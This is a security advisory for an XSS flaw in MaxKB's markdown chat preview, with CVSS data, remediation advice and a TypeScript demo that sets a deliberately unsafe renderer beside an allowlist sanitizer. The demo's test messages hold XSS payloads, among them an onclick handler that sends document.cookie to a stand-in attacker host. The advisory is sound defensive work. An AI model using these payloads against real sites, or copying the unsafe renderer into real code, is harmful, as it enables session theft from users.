CVE-2025-15632
Severity: MEDIUM
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description
A vulnerability has been found in 1Panel-dev MaxKB up to 2.4.2. Impacted is an unknown function of the file ui/src/chat.ts of the component MdPreview. Such manipulation leads to cross-site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.5.0 is recommended to address this issue. The name of the patch is 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.
Analysis
Cross-site scripting (XSS) in 1Panel-dev MaxKB up to version 2.4.2 allows an authenticated remote attacker (PR:L) to inject script through the MdPreview component in ui/src/chat.ts; the injected script runs with only passive user interaction (UI:P), such as a user viewing the affected chat content. Public exploit code exists for this vulnerability. The vendor fixed the flaw in version 2.5.0, in commit 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8.
Technical Context
The vulnerability sits in the MdPreview component, in the file ui/src/chat.ts of MaxKB's TypeScript UI layer. MdPreview renders chat content written in markdown; because the rendered output is not adequately sanitized, an attacker who can get HTML into a chat message can have arbitrary HTML and JavaScript emitted into the page. The weakness is CWE-79 (Improper Neutralization of Input During Web Page Generation): untrusted data from chat messages reaches the DOM without being encoded or filtered on output. A Content Security Policy can limit what an injected script is able to do, but it is a mitigation, not a substitute for the missing neutralization. The CVE record lists the affected CPE as cpe:2.3:a:1panel-dev:maxkb:*:*:*:*:*:*:*:*, with the affected version range bounded at 2.4.2 inclusive.
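The flaw class described above, as an added example in TypeScript (the language of MaxKB's UI layer) that is not code from MaxKB or its MdPreview component: a toy markdown renderer that passes raw HTML through, as many markdown renderers do by default, beside an allowlist sanitizer applied to its output before it would reach the DOM. The renderer, the sanitizer, its tag and attribute allowlists, the URL scheme check and the sample chat messages are all constructed for this demonstration and are assumptions, not the project's code. It goes beyond the single chat.ts case by covering the usual payload shapes a markdown preview sees: raw tags with event handlers, javascript: link targets, and script elements.

```typescript
// Allowlist for the sanitizer: anything not listed is dropped, so new attack
// surface (img/onerror, svg/onload, iframe, style) is closed by default.
// Constructed for this example; not MaxKB's MdPreview implementation.
const ALLOWED_TAGS = new Set([
  "p", "br", "strong", "em", "b", "i", "code", "pre",
  "ul", "ol", "li", "blockquote", "a",
]);
const ALLOWED_ATTRS: Record<string, Set<string>> = { a: new Set(["href", "title"]) };

function escapeHtml(s: string): string {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Element content only needs < and > neutralised; & is left alone so entities
// the renderer already emitted (&lt;, &amp;) are not double-encoded.
function escapeStrayText(s: string): string {
  return s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Toy markdown subset: **bold**, `code`, [text](url). Raw HTML in the input is
// passed through untouched, which is the unsafe pattern: chat text becomes markup.
function renderMarkdownUnsafe(md: string): string {
  return md
    .replace(/`([^`]+)`/g, (_m: string, c: string) => `<code>${escapeHtml(c)}</code>`)
    .replace(/\*\*([^*]+)\*\*/g, "<strong>$1</strong>")
    .replace(/\[([^\]]+)\]\(((?:[^()]|\([^()]*\))+)\)/g, '<a href="$2">$1</a>');
}

// An href is safe when it is relative or uses http, https or mailto. Whitespace
// and control characters are stripped first because browsers ignore them inside
// the scheme, so "java\tscript:" still runs as javascript:.
function isSafeUrl(url: string): boolean {
  const cleaned = url.replace(/[\s\u0000-\u001f]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m === null || ["http", "https", "mailto"].includes(m[1]);
}

// Re-emit only allowlisted attributes of an allowlisted tag; on* handlers,
// style and unknown attributes are never copied across.
function sanitizeAttrs(tag: string, rawAttrs: string): string {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return "";
  const attrRe = /([a-zA-Z][\w:-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let out = "";
  let m: RegExpExecArray | null;
  while ((m = attrRe.exec(rawAttrs)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    if (!allowed.has(name)) continue;
    if (name === "href" && !isSafeUrl(value)) continue;
    out += ` ${name}="${escapeHtml(value)}"`;
  }
  return out;
}

// Allowlist sanitizer over rendered HTML: known tags are rebuilt from scratch,
// unknown tags are dropped, and any stray < or > left in text is escaped.
function sanitizeHtml(html: string): string {
  // script/style go together with their bodies; dropping only the tag would
  // leave the JavaScript source behind as visible text.
  const stripped = html.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, "");
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  let out = "";
  let last = 0;
  let m: RegExpExecArray | null;
  while ((m = tagRe.exec(stripped)) !== null) {
    out += escapeStrayText(stripped.slice(last, m.index));
    last = m.index + m[0].length;
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) continue;
    out += m[0].startsWith("</") ? `</${tag}>` : `<${tag}${sanitizeAttrs(tag, m[2])}>`;
  }
  return out + escapeStrayText(stripped.slice(last));
}

// The hardened path: same renderer, output sanitized before it reaches the DOM.
function renderMarkdownSafe(md: string): string {
  return sanitizeHtml(renderMarkdownUnsafe(md));
}

// Constructed chat messages: one benign, four carrying XSS payloads.
const CONSTRUCTED_MESSAGES: string[] = [
  "Run `ls <dir>` **now**, see [docs](https://example.com/docs?a=1&b=2).",
  '<img src=x onerror="alert(document.cookie)">',
  "[click me](javascript:alert(1))",
  '<a href="https://example.com" onclick="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">safe-looking link</a>',
  "<script>alert(1)</script>Hi",
];

for (const msg of CONSTRUCTED_MESSAGES) {
  console.log("unsafe:", renderMarkdownUnsafe(msg));
  console.log("safe:  ", renderMarkdownSafe(msg));
}
```

The sanitizer is deliberately an allowlist rather than a blocklist: the tags and attributes it re-emits are the only ones that can ever appear, so the four payloads fail in four different ways (the img tag is dropped whole, the javascript: href is removed while the link text survives, the onclick handler is discarded from an otherwise legitimate anchor, and the script element disappears with its body). In a real deployment the same shape is obtained by running a maintained sanitizer over the renderer's output, or by disabling raw HTML in the markdown renderer, and by never assigning rendered chat content to innerHTML or v-html without one of those steps.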
Affected Products
1Panel-dev MaxKB versions up to and including 2.4.2 are affected. The fix is available in version 2.5.0 and later. Users can reference the vendor's GitHub repository and releases page at https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0 for patch delivery.
Remediation
Upgrade MaxKB to version 2.5.0 or later, which carries the fix in commit 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8; upgrade instructions are on the official releases page at https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0. Where an immediate upgrade is not possible, reduce exposure rather than expect to close it: the attack needs only low-privilege access (PR:L), so limit chat functionality to trusted users, and review stored chat content for raw HTML or script markup that no legitimate message should contain. Deploy a Content Security Policy whose script-src does not allow 'unsafe-inline', so that an injected inline script or javascript: URL is blocked even if it reaches the page; this limits impact but does not remove the flaw.